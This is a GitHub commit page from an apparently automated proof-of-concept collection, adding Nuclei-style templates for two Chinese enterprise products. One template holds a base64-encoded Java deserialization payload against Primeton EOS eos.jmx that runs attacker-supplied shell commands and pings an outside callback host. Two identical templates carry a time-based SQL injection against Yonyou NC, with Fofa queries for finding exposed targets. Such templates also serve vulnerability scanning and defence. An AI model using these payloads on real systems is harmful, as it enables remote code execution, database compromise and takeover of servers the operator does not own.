Skip to content

Commit

Permalink
20240507
Browse files Browse the repository at this point in the history
  • Loading branch information
@actions-user
actions-user committed May 7, 2024
1 parent 02e7728 commit 21a7932
Show file tree
Hide file tree
Showing 4 changed files with 92 additions and 0 deletions.
3 changes: 3 additions & 0 deletions poc.txt
View file
Original file line number Diff line number Diff line change
Expand Up @@ -45768,6 +45768,7 @@
./poc/remote_code_execution/emails-verification-for-woocommerce-cb9c6e9ca43499301d269d40f3b3b068.yaml
./poc/remote_code_execution/emails-verification-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/remote_code_execution/emails-verification-for-woocommerce-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/remote_code_execution/eos-platform-eos-jmx-rce.yaml
./poc/remote_code_execution/esafenet-cdg-dataimport-rce.yaml
./poc/remote_code_execution/esafenet-cdgserver3-solr-rce.yaml
./poc/remote_code_execution/esaitongrce.yaml
Expand Down Expand Up @@ -48812,6 +48813,7 @@
./poc/sql/yonyou-grp-u8-sqli-to-rce.yml
./poc/sql/yonyou-grp-u8-sqli.yml
./poc/sql/yonyou-nc-PaWfm-sqli.yaml
./poc/sql/yonyou-nc-down-bill-sqli.yaml
./poc/sql/yonyou-nc-runStateServlet-sqli.yaml
./poc/sql/yonyou-nc-workflowImageServlet-sqli.yaml
./poc/sql/yonyou-u8-cloud-ExportUfoFormatAction-sqli.yaml
Expand Down Expand Up @@ -49370,6 +49372,7 @@
./poc/sql_injection/yonyou-grp-u8-sqli-to-rce.yml
./poc/sql_injection/yonyou-grp-u8-sqli.yml
./poc/sql_injection/yonyou-nc-PaWfm-sqli.yaml
./poc/sql_injection/yonyou-nc-down-bill-sqli.yaml
./poc/sql_injection/yonyou-nc-runStateServlet-sqli.yaml
./poc/sql_injection/yonyou-nc-workflowImageServlet-sqli.yaml
./poc/sql_injection/yonyou-u8-cloud-ExportUfoFormatAction-sqli.yaml
Expand Down
31 changes: 31 additions & 0 deletions poc/remote_code_execution/eos-platform-eos-jmx-rce.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,31 @@
id: eos-platform-eos-jmx-rce

info:
name: EOS Platform eos.jmx - Remote Code Execution
author: Co5mos
severity: high
description: |
普元EOS Platform中间件eos.jmx存在反序列化漏洞,未经身份验证的攻击者可利用此漏洞执行任意代码,反弹shell或者写入后门文件,进一步可获取服务器权限。
reference:
- https://github.com/wy876/POC/blob/437fad5c987d7a15441fd5e05cb793b08181809b/%E6%99%AE%E5%85%83EOS-Platform-eos.jmx%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md?plain=1
metadata:
fofa-query: body="普元" || (body="ame.primeton.com" && body="eos-web")
tags: eos,rce

http:
- raw:
- |
POST /workspace/frame/permission/common/eos.jmx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
X-Token-Data: ping {{interactsh-url}}
Content-Type: text/plain
Connection: close
{{base64_decode("rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3Ijt/kQAhlemwIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAJSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WgAVX3VzZVNlcnZpY2VzTWVjaGFuaXNtTAAZX2FjY2Vzc0V4dGVybmFsU3R5bGVzaGVldHEAfgAETAALX2F1eENsYXNzZXN0ADtMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvSGFzaHRhYmxlO1sACl9ieXRlY29kZXN0AANbW0JbAAZfY2xhc3N0ABJbTGphdmEvbGFuZy9DbGFzcztMAAVfbmFtZXEAfgAETAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAAAAAAAAB0AANhbGxwdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAD/PK/rq+AAAAMQDjAQAub3JnL2FwYWNoZS9jb3lvdGUvdGFnbGliL2NvcmUvQ29udmVydGVySW1wbFRhZwcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlDAAFAAYKAAQACQEAAXEBADMoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2lvL0J5dGVBcnJheU91dHB1dFN0cmVhbTsBAAdleGVjQ21kDAANAAwKAAIADgEACDxjbGluaXQ+AQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uBwARAQAfamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbgcAEwEAE2phdmEvbGFuZy9FeGNlcHRpb24HABUBABVqYXZhL2xhbmcvVGhyZWFkR3JvdXAHABcBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIHABkBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcAGwEAE1tMamF2YS9sYW5nL1RocmVhZDsHAB0BABBqYXZhL2xhbmcvVGhyZWFkBwAfAQAQamF2YS9sYW5nL1N0cmluZwcAIQEADmphdmEvdXRpbC9MaXN0BwAjAQAdamF2YS9pby9CeXRlQXJyYXlPdXRwdXRTdHJlYW0HACUBAA1TdGFja01hcFRhYmxlAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DAAoACkKACAAKgEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwwALAAtCgAgAC4BABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7DAAwADEKACAAMgEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwANAA1CgAEADYBAAd0aHJlYWRzCAA4AQAPamF2YS9sYW5nL0NsYXNzBwA6AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAPAA9CgA7AD4BAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwAQABBCgAcAEIBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwARABFCgAcAEYBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsMAEgASQoAIABKAQAEZXhlYwgATAEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaDABOAE8KACIAUAEABGh0dHAIAFIBAAZ0YXJnZXQIAFQBABJqYXZhL2xhbmcvUnVubmFibGUHAFYBAAZ0aGlzJDAIAFgBAAdoYW5kbGVyCABaAQANZ2V0U3VwZXJjbGFzcwwAXAA1CgA7AF0BAAZnbG9iYWwIAF8BAApwcm9jZXNzb3JzCABhAQAEc2l6ZQEAAygpSQwAYwBkCwAkAGUBABUoSSlMamF2YS9sYW5nL09iamVjdDsMAEQAZwsAJABoAQADcmVxCABqAQALZ2V0UmVzcG9uc2UIAGwBAAlnZXRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DABuAG8KADsAcAEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAcAcgEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwwAdAB1CgBzAHYBAAlnZXRIZWFkZXIIAHgBAApDTURfSEVBREVSAQASTGphdmEvbGFuZy9TdHJpbmc7DAB6AHsJAAIAfAEAB2lzRW1wdHkBAAMoKVoMAH4AfwoAIgCAAQAJc2V0U3RhdHVzCACCAQARamF2YS9sYW5nL0ludGVnZXIHAIQBAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsMAIYAhwkAhQCIAQAEKEkpVgwABQCKCgCFAIsMAAsADAoAAgCNAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rCACPAQAHZm9yTmFtZQEAPShMamF2YS9sYW5nL1N0cmluZztaTGphdmEvbGFuZy9DbGFzc0xvYWRlcjspTGphdmEvbGFuZy9DbGFzczsMAJEAkgoAOwCTAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwAlQCWCgA7AJcBAAhzZXRCeXRlcwgAmQEAAltCBwCbAQARZ2V0RGVjbGFyZWRNZXRob2QMAJ0AbwoAOwCeAQALdG9CeXRlQXJyYXkBAAQoKVtCDACgAKEKACYAogEAB3ZhbHVlT2YBABYoSSlMamF2YS9sYW5nL0ludGVnZXI7DACkAKUKAIUApgEAB2RvV3JpdGUIAKgBABNqYXZhLm5pby5CeXRlQnVmZmVyCACqAQAEd3JhcAgArAEA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")}}
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
29 changes: 29 additions & 0 deletions poc/sql/yonyou-nc-down-bill-sqli.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: yonyou-nc-down-bill-sqli

info:
name: Yonyou NC down/bill - SQL Injection
author: Co5mos
severity: high
description: |
用友NC //portal/pt/erfile/down/bill接口的id参数存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
reference:
- https://github.com/wy876/POC/blob/437fad5c987d7a15441fd5e05cb793b08181809b/%E7%94%A8%E5%8F%8BNC-bill%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
fofa-query: icon_hash="1085941792" && body="/logo/images/logo.gif"
tags: yonyou,sqli

http:
- raw:
- |
@timeout: 10s
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),4)-- HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Charset: utf-8
matchers:
- type: dsl
dsl:
- duration>=4
- status_code == 500
condition: and
29 changes: 29 additions & 0 deletions poc/sql_injection/yonyou-nc-down-bill-sqli.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: yonyou-nc-down-bill-sqli

info:
name: Yonyou NC down/bill - SQL Injection
author: Co5mos
severity: high
description: |
用友NC //portal/pt/erfile/down/bill接口的id参数存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
reference:
- https://github.com/wy876/POC/blob/437fad5c987d7a15441fd5e05cb793b08181809b/%E7%94%A8%E5%8F%8BNC-bill%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
fofa-query: icon_hash="1085941792" && body="/logo/images/logo.gif"
tags: yonyou,sqli

http:
- raw:
- |
@timeout: 10s
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),4)-- HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept-Charset: utf-8
matchers:
- type: dsl
dsl:
- duration>=4
- status_code == 500
condition: and

0 comments on commit 21a7932

Please sign in to comment.